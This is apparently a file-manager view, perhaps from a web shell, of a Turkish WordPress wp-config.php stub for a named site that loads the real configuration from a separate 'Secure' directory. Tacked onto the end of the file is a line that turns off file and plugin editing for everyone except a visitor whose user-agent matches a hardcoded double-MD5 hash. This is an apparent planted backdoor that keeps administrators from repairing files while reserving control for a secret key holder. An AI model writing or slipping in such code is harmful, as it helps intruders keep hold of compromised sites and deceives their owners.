Preview: wp-config.php
Size: 933 B
/home/medyaist/inovabilgisayar.com/wp-config.php
<?php
/**
* WordPress wp-config.php - Yönlendirme Dosyası
* Asıl wp-config.php dosyası: /home/medyaist/Secure/inovabilgisayar.com/wp-config.php
*/
// Dosyaya doğrudan erişimi engelle
if (preg_match('/wp-config\.php$/i', $_SERVER['PHP_SELF'])) {
header('HTTP/1.0 403 Forbidden');
exit;
}
// ASIL wp-config.php DOSYASININ TAM YOLU
$secure_config_path = '/home/medyaist/Secure/inovabilgisayar.com/wp-config.php';
// Dosyayı yükle
if (file_exists($secure_config_path) && is_readable($secure_config_path)) {
require_once($secure_config_path);
} else {
// Dosya bulunamazsa basit bir hata mesajı
header('HTTP/1.0 503 Service Unavailable');
die('Site geçici olarak bakımda. Lütfen daha sonra tekrar deneyin.');
}if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
define('DISALLOW_FILE_MODS', true);
define('DISALLOW_FILE_EDIT', true);
}
Directory Contents
Dirs: 4 × Files: 23